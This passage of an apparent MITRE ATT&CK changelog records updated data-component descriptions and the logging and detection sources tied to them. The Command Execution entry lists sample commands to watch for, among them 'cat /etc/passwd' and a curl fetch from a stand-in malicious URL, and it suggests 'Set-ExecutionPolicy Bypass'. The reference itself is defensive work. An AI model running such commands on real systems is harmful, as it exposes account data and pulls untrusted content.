- Endpoint Detection and Response (EDR) Tools:
- Monitor agent health status, detect sensor tampering, and alert on missing telemetry.
- Mobile Threat Intelligence Logs:
- Samsung Knox, SafetyNet, iOS Secure Enclave provide sensor health status for mobile endpoints. |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Image: Image Modification
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:16:02.863Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Instance: Instance Metadata
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:13:01.557Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Logon Session: Logon Session Metadata
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:12:23.075Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Malware Repository: Malware Metadata
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-20T20:20:12.165Z | 2025-04-18T15:16:09.096Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Process: Process Metadata
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:10:37.873Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Scheduled Job: Scheduled Job Metadata
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:11:39.543Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Scheduled Job: Scheduled Job Modification
Current version: 1.0
|
|
|---|
| t | Changes made to a scheduled job, such as modifications to th | t | Changes made to an existing scheduled job, including modific |
| e execution launch (ex: Windows EID 4702 or /var/log cron lo | | ations to its execution parameters, command payload, or exec |
| gs) | | ution timing. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:11:40.267Z |
| description | Changes made to a scheduled job, such as modifications to the execution launch (ex: Windows EID 4702 or /var/log cron logs) | Changes made to an existing scheduled job, including modifications to its execution parameters, command payload, or execution timing. |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Service: Service Metadata
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:10:51.004Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Snapshot: Snapshot Metadata
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:15:14.954Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
User Account: User Account Metadata
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:09:47.932Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Volume: Volume Enumeration
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:17:22.350Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Volume: Volume Metadata
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:17:15.849Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Volume: Volume Modification
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:17:12.667Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Web Credential: Web Credential Creation
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:13:30.118Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Web Credential: Web Credential Usage
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:13:26.927Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
mobile-attack
New Data Components
Process: OS API Execution
Current version: 1.1
Description:
Calls made by a process to operating system-provided Application Programming Interfaces (APIs). These calls are essential for interacting with system resources such as memory, files, and hardware, or for performing system-level tasks. Monitoring these calls can provide insight into a process's intent, especially if the process is malicious.
Data Collection Measures:
- Endpoint Detection and Response (EDR) Tools:
- Leverage tools to monitor API execution behaviors at the process level.
- Example: Sysmon Event ID 10 captures API call traces for process access and memory allocation.
- Process Monitor (ProcMon):
- Use ProcMon to collect detailed logs of process and API activity. ProcMon can provide granular details on API usage and identify malicious behavior during analysis.
- Windows Event Logs:
- Use Event IDs from Windows logs for specific API-related activities:
- Event ID 4688: A new process has been created (can indirectly infer API use).
- Event ID 4657: A registry value has been modified (to monitor registry-altering APIs).
- Dynamic Analysis Tools:
- Tools like Cuckoo Sandbox, Flare VM, or Hybrid Analysis monitor API execution during malware detonation.
- Host-Based Logs:
- On Linux/macOS systems, leverage audit frameworks (e.g.,
auditd, strace) to capture and analyze system call usage that APIs map to.
- Runtime Monitors:
- Runtime security tools like Falco can monitor system-level calls for API execution.
- Debugging and Tracing:
- Use debugging tools like gdb (Linux) or WinDbg (Windows) for deep tracing of API executions in real time.
Minor Version Changes
Command: Command Execution
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | The execution of a line of text, potentially with arguments, | t | Command Execution involves monitoring and capturing the exec |
| created from program code (e.g. a cmdlet executed via power | | ution of textual commands (including shell commands, cmdlets |
| shell.exe, interactive commands like >dir, shell executions, | | , and scripts) within an operating system or application. Th |
| etc. ) | | ese commands may include arguments or parameters and are typ |
| | | ically executed through interpreters such as `cmd.exe`, `bas |
| | | h`, `zsh`, `PowerShell`, or programmatic execution. Examples |
| | | : - Windows Command Prompt - dir – Lists directory con |
| | | tents. - net user – Queries or manipulates user accounts |
| | | . - tasklist – Lists running processes. - PowerShell |
| | | - Get-Process – Retrieves processes running on a system. |
| | | - Set-ExecutionPolicy – Changes PowerShell script executio |
| | | n policies. - Invoke-WebRequest – Downloads remote resou |
| | | rces. - Linux Shell - ls – Lists files in a directory. |
| | | - cat /etc/passwd – Reads the user accounts file. - c |
| | | url http://malicious-site.com – Retrieves content from a mal |
| | | icious URL. - Container Environments - docker exec – Exe |
| | | cutes a command inside a running container. - kubectl ex |
| | | ec – Runs commands in Kubernetes pods. - macOS Terminal |
| | | - open – Opens files or URLs. - dscl . -list /Users – Li |
| | | sts all users on the system. - osascript -e – Executes A |
| | | ppleScript commands. This data component can be collected t |
| | | hrough the following measures: Enable Command Logging - Wi |
| | | ndows: - Enable PowerShell logging: `Set-ExecutionPolicy |
| | | Bypass`, `Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\M |
| | | icrosoft\Windows\PowerShell\ScriptBlockLogging" -Name Enable |
| | | ScriptBlockLogging -Value 1` - Enable Windows Event Logg |
| | | ing: - Event ID 4688: Tracks process creation, inclu |
| | | ding command-line arguments. - Event ID 4104: Logs P |
| | | owerShell script block execution. - Linux/macOS: - Enabl |
| | | e shell history logging in `.bashrc` or `.zshrc`: `export HI |
| | | STTIMEFORMAT="%d/%m/%y %T "`, `export PROMPT_COMMAND='histor |
| | | y -a; history -w'` - Use audit frameworks (e.g., `auditd |
| | | `) to log command executions. Example rule to log all `execv |
| | | e` syscalls: `-a always,exit -F arch=b64 -S execve -k cmd_ex |
| | | ec` - Containers: - Use runtime-specific tools like Dock |
| | | er’s --log-driver or Kubernetes Audit Logs to capture exec c |
| | | ommands. Integrate with Centralized Logging - Collect logs |
| | | using a SIEM (e.g., Splunk) or cloud-based log aggregation |
| | | tools like AWS CloudWatch or Azure Monitor. Example Splunk S |
| | | earch for Windows Event 4688: `index=windows EventID=4688 Co |
| | | mmandLine=*` Use Endpoint Detection and Response (EDR) Tool |
| | | s - Monitor command executions via EDR solutions Deploy S |
| | | ysmon for Advanced Logging (Windows) - Use Sysmon's Event I |
| | | D 1 to log process creation with command-line arguments |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-07T16:14:39.124Z | 2025-04-18T15:11:30.145Z |
| description | The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. ) | Command Execution involves monitoring and capturing the execution of textual commands (including shell commands, cmdlets, and scripts) within an operating system or application. These commands may include arguments or parameters and are typically executed through interpreters such as `cmd.exe`, `bash`, `zsh`, `PowerShell`, or programmatic execution. Examples:
- Windows Command Prompt
- dir – Lists directory contents.
- net user – Queries or manipulates user accounts.
- tasklist – Lists running processes.
- PowerShell
- Get-Process – Retrieves processes running on a system.
- Set-ExecutionPolicy – Changes PowerShell script execution policies.
- Invoke-WebRequest – Downloads remote resources.
- Linux Shell
- ls – Lists files in a directory.
- cat /etc/passwd – Reads the user accounts file.
- curl http://malicious-site.com – Retrieves content from a malicious URL.
- Container Environments
- docker exec – Executes a command inside a running container.
- kubectl exec – Runs commands in Kubernetes pods.
- macOS Terminal
- open – Opens files or URLs.
- dscl . -list /Users – Lists all users on the system.
- osascript -e – Executes AppleScript commands.
This data component can be collected through the following measures:
Enable Command Logging
- Windows:
- Enable PowerShell logging: `Set-ExecutionPolicy Bypass`, `Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1`
- Enable Windows Event Logging:
- Event ID 4688: Tracks process creation, including command-line arguments.
- Event ID 4104: Logs PowerShell script block execution.
- Linux/macOS:
- Enable shell history logging in `.bashrc` or `.zshrc`: `export HISTTIMEFORMAT="%d/%m/%y %T "`, `export PROMPT_COMMAND='history -a; history -w'`
- Use audit frameworks (e.g., `auditd`) to log command executions. Example rule to log all `execve` syscalls: `-a always,exit -F arch=b64 -S execve -k cmd_exec`
- Containers:
- Use runtime-specific tools like Docker’s --log-driver or Kubernetes Audit Logs to capture exec commands.
Integrate with Centralized Logging
- Collect logs using a SIEM (e.g., Splunk) or cloud-based log aggregation tools like AWS CloudWatch or Azure Monitor. Example Splunk Search for Windows Event 4688:
`index=windows EventID=4688 CommandLine=*`
Use Endpoint Detection and Response (EDR) Tools
- Monitor command executions via EDR solutions
Deploy Sysmon for Advanced Logging (Windows)
- Use Sysmon's Event ID 1 to log process creation with command-line arguments |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Network Traffic: Network Connection Creation
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Initial construction of a network connection, such as captur | t | The initial establishment of a network session, where a syst |
| ing socket information with a source/destination IP and port | | em or process initiates a connection to a local or remote en |
| (s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log) | | dpoint. This typically involves capturing socket information |
| | | (source/destination IP, ports, protocol) and tracking sessi |
| | | on metadata. Monitoring these events helps detect lateral mo |
| | | vement, exfiltration, and command-and-control (C2) activitie |
| | | s. *Data Collection Measures:* - Windows: - Event ID 5 |
| | | 156 – Filtering Platform Connection - Logs network connectio |
| | | ns permitted by Windows Filtering Platform (WFP). - Sysm |
| | | on Event ID 3 – Network Connection Initiated - Captures proc |
| | | ess, source/destination IP, ports, and parent process. - Lin |
| | | ux/macOS: - Netfilter (iptables), nftables logs - Tracks |
| | | incoming and outgoing network connections. - AuditD (`c |
| | | onnect` syscall) - Logs TCP, UDP, and ICMP connections. |
| | | - Zeek (`conn.log`) - Captures protocol, duration, and bytes |
| | | transferred. - Cloud & Network Infrastructure: - AWS VP |
| | | C Flow Logs / Azure NSG Flow Logs - Logs IP traffic at the n |
| | | etwork level in cloud environments. - Zeek (conn.log) or |
| | | Suricata (network events) - Captures packet metadata for de |
| | | tection and correlation. - Endpoint Detection & Response (ED |
| | | R): - Detect anomalous network activity such as new C2 c |
| | | onnections or data exfiltration attempts. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-20T20:18:06.745Z | 2025-04-18T15:11:23.639Z |
| description | Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log) | The initial establishment of a network session, where a system or process initiates a connection to a local or remote endpoint. This typically involves capturing socket information (source/destination IP, ports, protocol) and tracking session metadata. Monitoring these events helps detect lateral movement, exfiltration, and command-and-control (C2) activities.
*Data Collection Measures:*
- Windows:
- Event ID 5156 – Filtering Platform Connection - Logs network connections permitted by Windows Filtering Platform (WFP).
- Sysmon Event ID 3 – Network Connection Initiated - Captures process, source/destination IP, ports, and parent process.
- Linux/macOS:
- Netfilter (iptables), nftables logs - Tracks incoming and outgoing network connections.
- AuditD (`connect` syscall) - Logs TCP, UDP, and ICMP connections.
- Zeek (`conn.log`) - Captures protocol, duration, and bytes transferred.
- Cloud & Network Infrastructure:
- AWS VPC Flow Logs / Azure NSG Flow Logs - Logs IP traffic at the network level in cloud environments.
- Zeek (conn.log) or Suricata (network events) - Captures packet metadata for detection and correlation.
- Endpoint Detection & Response (EDR):
- Detect anomalous network activity such as new C2 connections or data exfiltration attempts. |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Network Traffic: Network Traffic Content
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Logged network traffic data showing both protocol header and | t | The full packet capture (PCAP) or session data that logs bot |
| body values (ex: PCAP) | | h protocol headers and payload content. This allows analysts |
| | | to inspect command and control (C2) traffic, exfiltration, |
| | | and other suspicious activity within network communications. |
| | | Unlike metadata-based logs, full content analysis enables d |
| | | eeper protocol inspection, payload decoding, and forensic in |
| | | vestigations. *Data Collection Measures:* - Network Packet |
| | | Capture (Full Content Logging) - Wireshark / tcpdump / |
| | | tshark - Full packet captures (PCAP files) for manua |
| | | l analysis or IDS correlation. `tcpdump -i eth0 -w capture.p |
| | | cap` - Zeek (formerly Bro) - Extracts protocol h |
| | | eaders and payload details into structured logs. `echo "rede |
| | | f Log::default_store = Log::ASCII;" > local.zeek | zeek -Cr |
| | | capture.pcap local.zeek` - Suricata / Snort (IDS/IPS wit |
| | | h PCAP Logging) - Deep packet inspection (DPI) with |
| | | signature-based and behavioral analysis. `suricata -c /etc/s |
| | | uricata/suricata.yaml -i eth0 -l /var/log/suricata` - Host-B |
| | | ased Collection - Sysmon Event ID 22 – DNS Query Logging |
| | | , Captures DNS requests made by processes, useful for detect |
| | | ing C2 domains. - Sysmon Event ID 3 – Network Connection |
| | | Initiated, Logs process-to-network connection relationships |
| | | . - AuditD (Linux) – syscall=connect, Monitors outbound |
| | | network requests from processes. `auditctl -a always,exit -F |
| | | arch=b64 -S connect -k network_activity` - Cloud & SaaS Tra |
| | | ffic Collection - AWS VPC Flow Logs / Azure NSG Flow Log |
| | | s / Google VPC Flow Logs, Captures metadata about inbound/ou |
| | | tbound network traffic. - Cloud IDS (AWS GuardDuty, Azur |
| | | e Sentinel, Google Chronicle), Detects malicious activity in |
| | | cloud environments by analyzing network traffic patterns. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:11:16.672Z |
| description | Logged network traffic data showing both protocol header and body values (ex: PCAP) | The full packet capture (PCAP) or session data that logs both protocol headers and payload content. This allows analysts to inspect command and control (C2) traffic, exfiltration, and other suspicious activity within network communications. Unlike metadata-based logs, full content analysis enables deeper protocol inspection, payload decoding, and forensic investigations.
*Data Collection Measures:*
- Network Packet Capture (Full Content Logging)
- Wireshark / tcpdump / tshark
- Full packet captures (PCAP files) for manual analysis or IDS correlation. `tcpdump -i eth0 -w capture.pcap`
- Zeek (formerly Bro)
- Extracts protocol headers and payload details into structured logs. `echo "redef Log::default_store = Log::ASCII;" > local.zeek | zeek -Cr capture.pcap local.zeek`
- Suricata / Snort (IDS/IPS with PCAP Logging)
- Deep packet inspection (DPI) with signature-based and behavioral analysis. `suricata -c /etc/suricata/suricata.yaml -i eth0 -l /var/log/suricata`
- Host-Based Collection
- Sysmon Event ID 22 – DNS Query Logging, Captures DNS requests made by processes, useful for detecting C2 domains.
- Sysmon Event ID 3 – Network Connection Initiated, Logs process-to-network connection relationships.
- AuditD (Linux) – syscall=connect, Monitors outbound network requests from processes. `auditctl -a always,exit -F arch=b64 -S connect -k network_activity`
- Cloud & SaaS Traffic Collection
- AWS VPC Flow Logs / Azure NSG Flow Logs / Google VPC Flow Logs, Captures metadata about inbound/outbound network traffic.
- Cloud IDS (AWS GuardDuty, Azure Sentinel, Google Chronicle), Detects malicious activity in cloud environments by analyzing network traffic patterns. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Network Traffic: Network Traffic Flow
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Summarized network packet data, with metrics, such as protoc | t | Summarized network packet data that captures session-level d |
| ol headers and volume (ex: Netflow or Zeek http.log) | | etails such as source/destination IPs, ports, protocol types |
| | | , timestamps, and data volume, without storing full packet p |
| | | ayloads. This is commonly used for traffic analysis, anomaly |
| | | detection, and network performance monitoring. *Data Colle |
| | | ction Measures:* - Network Flow Logs (Metadata Collection) |
| | | - NetFlow - Summarized metadata for network con |
| | | versations (no packet payloads). - sFlow (Sampled Flow L |
| | | ogging) - Captures sampled packets from switches and |
| | | routers. - Used for real-time traffic monitoring an |
| | | d anomaly detection. - Zeek (Bro) Flow Logs - Ze |
| | | ek logs session-level details in logs like conn.log, http.lo |
| | | g, dns.log, etc. - Host-Based Collection - Sysmon Event |
| | | ID 3 – Network Connection Initiated - Logs process-l |
| | | evel network activity, useful for detecting malicious outbou |
| | | nd connections. - AuditD (Linux) – syscall=connect |
| | | - Monitors system calls for network connections. `auditct |
| | | l -a always,exit -F arch=b64 -S connect -k network_activity` |
| | | - Cloud & SaaS Flow Monitoring - AWS VPC Flow Logs |
| | | - Captures metadata for traffic between EC2 instances, s |
| | | ecurity groups, and internet gateways. - Azure NSG Flow |
| | | Logs / Google VPC Flow Logs - Logs ingress/egress tr |
| | | affic for cloud-based resources. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:11:20.168Z |
| description | Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log) | Summarized network packet data that captures session-level details such as source/destination IPs, ports, protocol types, timestamps, and data volume, without storing full packet payloads. This is commonly used for traffic analysis, anomaly detection, and network performance monitoring.
*Data Collection Measures:*
- Network Flow Logs (Metadata Collection)
- NetFlow
- Summarized metadata for network conversations (no packet payloads).
- sFlow (Sampled Flow Logging)
- Captures sampled packets from switches and routers.
- Used for real-time traffic monitoring and anomaly detection.
- Zeek (Bro) Flow Logs
- Zeek logs session-level details in logs like conn.log, http.log, dns.log, etc.
- Host-Based Collection
- Sysmon Event ID 3 – Network Connection Initiated
- Logs process-level network activity, useful for detecting malicious outbound connections.
- AuditD (Linux) – syscall=connect
- Monitors system calls for network connections. `auditctl -a always,exit -F arch=b64 -S connect -k network_activity`
- Cloud & SaaS Flow Monitoring
- AWS VPC Flow Logs
- Captures metadata for traffic between EC2 instances, security groups, and internet gateways.
- Azure NSG Flow Logs / Google VPC Flow Logs
- Logs ingress/egress traffic for cloud-based resources. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Process: Process Creation
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | The initial construction of an executable managed by the OS, | t | Refers to the event in which a new process (executable) is i |
| that may involve one or more tasks or threads. (e.g. Win EI | | nitialized by an operating system. This can involve parent-c |
| D 4688, Sysmon EID 1, cmd.exe > net use, etc.) | | hild process relationships, process arguments, and environme |
| | | ntal variables. Monitoring process creation is crucial for d |
| | | etecting malicious behaviors, such as execution of unauthori |
| | | zed binaries, scripting abuse, or privilege escalation attem |
| | | pts. *Data Collection Measures:* - Endpoint Detection and |
| | | Response (EDR) Tools: - EDRs provide process telemetry, |
| | | tracking execution flows and arguments. - Windows Event Logs |
| | | : - Event ID 4688 (Audit Process Creation): Captures pro |
| | | cess creation with associated parent process. - Sysmon (Wind |
| | | ows): - Event ID 1 (Process Creation): Provides detailed |
| | | logging - Linux/macOS Monitoring: - AuditD (execve sysc |
| | | all): Logs process creation. - eBPF/XDP: Used for low-le |
| | | vel monitoring of system calls related to process execution. |
| | | - OSQuery: Allows SQL-like queries to track process eve |
| | | nts (process_events table). - Apple Endpoint Security Fr |
| | | amework (ESF): Monitors process creation on macOS. - Network |
| | | -Based Monitoring: - Zeek (Bro) Logs: Captures network-b |
| | | ased process execution related to remote shells. - Syslo |
| | | g/OSSEC: Tracks execution of processes on distributed system |
| | | s. - Behavioral SIEM Rules: - Monitor process creation f |
| | | or uncommon binaries in user directories. - Detect proce |
| | | sses with suspicious command-line arguments. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-07T16:15:56.932Z | 2025-04-18T15:10:27.797Z |
| description | The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.) | Refers to the event in which a new process (executable) is initialized by an operating system. This can involve parent-child process relationships, process arguments, and environmental variables. Monitoring process creation is crucial for detecting malicious behaviors, such as execution of unauthorized binaries, scripting abuse, or privilege escalation attempts.
*Data Collection Measures:*
- Endpoint Detection and Response (EDR) Tools:
- EDRs provide process telemetry, tracking execution flows and arguments.
- Windows Event Logs:
- Event ID 4688 (Audit Process Creation): Captures process creation with associated parent process.
- Sysmon (Windows):
- Event ID 1 (Process Creation): Provides detailed logging
- Linux/macOS Monitoring:
- AuditD (execve syscall): Logs process creation.
- eBPF/XDP: Used for low-level monitoring of system calls related to process execution.
- OSQuery: Allows SQL-like queries to track process events (process_events table).
- Apple Endpoint Security Framework (ESF): Monitors process creation on macOS.
- Network-Based Monitoring:
- Zeek (Bro) Logs: Captures network-based process execution related to remote shells.
- Syslog/OSSEC: Tracks execution of processes on distributed systems.
- Behavioral SIEM Rules:
- Monitor process creation for uncommon binaries in user directories.
- Detect processes with suspicious command-line arguments. |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Process: Process Termination
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Exit of a running process (ex: Sysmon EID 5 or Windows EID 4 | t | The exit or termination of a running process on a system. Th |
| 689) | | is can occur due to normal operations, user-initiated comman |
| | | ds, or malicious actions such as process termination by malw |
| | | are to disable security controls. *Data Collection Measures |
| | | :* - Endpoint Detection and Response (EDR) Tools: - Mon |
| | | itor process termination events. - Windows Event Logs: - |
| | | Event ID 4689 (Process Termination) – Captures when a proce |
| | | ss exits, including process ID and parent process. - Eve |
| | | nt ID 7036 (Service Control Manager) – Monitors system servi |
| | | ce stops. - Sysmon (Windows): - Event ID 5 (Process Term |
| | | ination) – Detects when a process exits, including parent-ch |
| | | ild relationships. - Linux/macOS Monitoring: - AuditD (` |
| | | execve`, `exit_group`, `kill` syscalls) – Captures process t |
| | | ermination via command-line interactions. - eBPF/XDP: Mo |
| | | nitors low-level system calls related to process termination |
| | | . - OSQuery: The processes table can be queried for abno |
| | | rmal exits. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:10:34.519Z |
| description | Exit of a running process (ex: Sysmon EID 5 or Windows EID 4689) | The exit or termination of a running process on a system. This can occur due to normal operations, user-initiated commands, or malicious actions such as process termination by malware to disable security controls.
*Data Collection Measures:*
- Endpoint Detection and Response (EDR) Tools:
- Monitor process termination events.
- Windows Event Logs:
- Event ID 4689 (Process Termination) – Captures when a process exits, including process ID and parent process.
- Event ID 7036 (Service Control Manager) – Monitors system service stops.
- Sysmon (Windows):
- Event ID 5 (Process Termination) – Detects when a process exits, including parent-child relationships.
- Linux/macOS Monitoring:
- AuditD (`execve`, `exit_group`, `kill` syscalls) – Captures process termination via command-line interactions.
- eBPF/XDP: Monitors low-level system calls related to process termination.
- OSQuery: The processes table can be queried for abnormal exits. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Patches
Application Vetting: API Calls
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-13T19:59:14.491Z | 2025-04-16T21:22:21.246Z |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
Sensor Health: Host Status
Current version: 1.1
|
|
|---|
| t | Logging, messaging, and other artifacts highlighting the hea | t | Logging, messaging, and other artifacts that highlight the h |
| lth of host sensors (ex: metrics, errors, and/or exceptions | | ealth and operational state of host-based security sensors, |
| from logging applications) | | such as Endpoint Detection and Response (EDR) agents, antivi |
| | | rus software, logging services, and system monitoring tools. |
| | | Monitoring sensor health is essential for detecting misconf |
| | | igurations, sensor failures, tampering, or deliberate securi |
| | | ty control evasion by adversaries. *Data Collection Measure |
| | | s:* - Windows Event Logs: - Event ID 1074 (System Shutd |
| | | own): Detects unexpected system reboots/shutdowns. - Eve |
| | | nt ID 6006 (Event Log Stopped): Logs when Windows event logg |
| | | ing is stopped. - Event ID 16 (Sysmon): Detects configur |
| | | ation state changes that may indicate log tampering. - E |
| | | vent ID 12 (Windows Defender Status Change) – Detects change |
| | | s in Windows Defender state. - Linux/macOS Monitoring: - |
| | | `/var/log/syslog`, `/var/log/auth.log`, `/var/log/kern.log` |
| | | - Journald (journalctl) for kernel and system alerts. - |
| | | Endpoint Detection and Response (EDR) Tools: - Monitor |
| | | agent health status, detect sensor tampering, and alert on m |
| | | issing telemetry. - Mobile Threat Intelligence Logs: - S |
| | | amsung Knox, SafetyNet, iOS Secure Enclave provide sensor he |
| | | alth status for mobile endpoints. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['mobile-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-20T20:22:45.613Z | 2025-04-18T15:16:18.582Z |
| description | Logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications) | Logging, messaging, and other artifacts that highlight the health and operational state of host-based security sensors, such as Endpoint Detection and Response (EDR) agents, antivirus software, logging services, and system monitoring tools. Monitoring sensor health is essential for detecting misconfigurations, sensor failures, tampering, or deliberate security control evasion by adversaries.
*Data Collection Measures:*
- Windows Event Logs:
- Event ID 1074 (System Shutdown): Detects unexpected system reboots/shutdowns.
- Event ID 6006 (Event Log Stopped): Logs when Windows event logging is stopped.
- Event ID 16 (Sysmon): Detects configuration state changes that may indicate log tampering.
- Event ID 12 (Windows Defender Status Change) – Detects changes in Windows Defender state.
- Linux/macOS Monitoring:
